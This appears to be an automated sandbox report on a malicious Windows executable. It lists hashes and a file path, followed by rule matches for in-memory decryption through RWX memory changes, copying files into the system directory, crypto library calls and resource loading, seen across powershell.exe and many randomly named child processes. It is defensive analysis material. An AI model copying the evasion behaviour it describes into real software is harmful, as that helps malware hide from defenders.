processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: d43a84bc5209061147da4d865148b0331f310389
sha256: 8eeb370edc1c90a0cb9aa1d24c8fbda5182289e9839f3cbdc1e0f6076571749e
size: 2075220
this_path: /data/cuckoo/storage/analyses/2000083/files/1029/MjEVFLO.exe
type: PE32+ executable (console) x86-64, for MS Windows

 Malicious

attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2440
process_name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Defense evasion
level: 2
matchedinfo: The malicious program copies files into the system directory in order to hide the malicious files
num: 396
process_id: 2440
process_name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
rulename: Copy file to system directory
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: Generally used for file encryption or encrypted data transfer, and possibly used in ransomware
num: 5327
process_id: 2144
process_name: powershell.exe
rulename: Call cryptographic algorithm library
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 5517
process_id: 2144
process_name: powershell.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 2
matchedinfo: The malicious program releases a resource from its resource section into memory and decrypts it there
num: 6285
process_id: 2144
process_name: powershell.exe
rulename: Load resource into memory
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2776
process_name: pVvHVXx.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1936
process_name: XIunuLE.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1836
process_name: jXGapzX.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2236
process_name: tGqMkEe.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2260
process_name: WYAFryj.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1840
process_name: tEyUWct.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2160
process_name: QTrpNtY.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1628
process_name: YuFgYGd.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1476
process_name: bjmXdBD.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 952
process_name: CLeZCRX.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2472
process_name: GWAmqsL.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2040
process_name: QPZwHlA.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2832
process_name: FiebfRo.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1880
process_name: nfHJuJN.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2368
process_name: TyMjkQV.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2428
process_name: loAnxnj.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2608
process_name: evVewtT.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2764
process_name: soaakCH.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1216
process_name: cepsWcl.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1612
process_name: dKYPoTY.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2932
process_name: LAoljGR.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2680
process_name: ZChGZRz.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1580
process_name: nVqBEZq.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2648
process_name: vfTeZBV.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2636
process_name: sjvOSaD.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 1860
process_name: xHbIQiT.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2356
process_name: eazKPGK.exe
rulename: Change memory region protection to read/write/execute
attck_tactics: Other malicious behaviour
level: 1
matchedinfo: The malware changes memory protection attributes in order to decrypt and execute malicious code in memory
num: 292
process_id: 2704
process_name: STZCYrB.exe
rulename: Change memory region protection to read/write/execute